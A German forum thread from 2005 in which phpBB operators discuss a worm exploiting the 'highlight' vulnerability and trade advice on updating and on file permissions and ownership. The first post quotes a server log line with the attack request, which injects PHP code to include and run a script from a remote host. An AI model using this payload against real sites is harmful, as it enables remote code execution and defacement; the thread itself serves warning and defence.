Neuer phpbb Wurm?

Roger Bobst

Angesehenes Mitglied
Hallo zusammen

Betreiber des phpbb Forum sollten sich wiedermal warm anziehen: Wies aussieht kricht wieder ein phpbb Wurm durchs Netz. Bei Parlaris haben wir im Moment neue Besucherrekorde :)

Auf den ersten Blick siehts aus, als würde die lange bekannte "Highlight" Schwachstelle ausgenutzt.
CODE 72.9.246.108 - - [10/Dec/2005:15:17:52 +0100] "GET /viewtopic.php?t=756&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 28381 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t Mist Aleks)"

Der nachgeladene Code von www.yatas.com versucht die index.php zu überschreiben, daher mein Tipp an alle: Prüft die Filerechte !

Doku: Filterechte bei phpbb

Gruss
Roger
 
Mein Hoster hat mich mitte Woche auf das Problem aufmerksam gemacht.
Es scheint, dass wenn man sauber auf 2.0.18 updated, auch die Probleme mit den rechten gelöst werden.

Frage: Welche Rechte sind denn OK? Bitte in rwxrwxrwx oder 644 Form.

Cheers, René
 
QUOTE Frage: Welche Rechte sind denn OK? Bitte in rwxrwxrwx oder 644 Form.
Siehe hier: http://www.phpbb.de/doku/kb/artikel.php?ar...highlight=chmod

Sie empfehlen dort für Files 644, wobei das eigentlich ungenau ist, weil wenn der Webserverbenutzer der Besitzer ist, hat er ja immernoch die Schreibrechte an den Files.

Also ist das Beste: 644 und der Besitzer der Files ist nicht der Webserverbenutzer (ob und wie das bei shared Hostings umsetzbar ist, weiss ich nihct)

Gruss
Roger
 
QUOTE (Roger Bobst @ So 11.12.2005, 10:39)[...] Sie empfehlen dort für Files 644, [...]

Hallo,

ein allgemeiner Tipp bei der Rechtvergabe. Falls der Server richtig einstellt ist, würde ich nach Möglichkeit immer das letzte Oktet auf 0 setzen, um den Zugriff für "Jeder" auf die Dateien und Ordner zu verhintern (statt 644 → 640 oder statt 777 → 770). Bei meinen PHP-Scripten und (X)HTML-Seiten gab es da zumindestens nie Probleme.
Ich habe halt etwas dagegen, dass jemand anderes auf den Server meine Dateien betrachten kann (zumindestens bei den Scripten). ;-)



MfG Sascha Ahlers
 
ich hätte noch gerne gewusst, ob es auf unix ein chown befehl gibt, mit dem man den owner aller files in einem verzeichnis setzen kann.
 
Zurück
Oben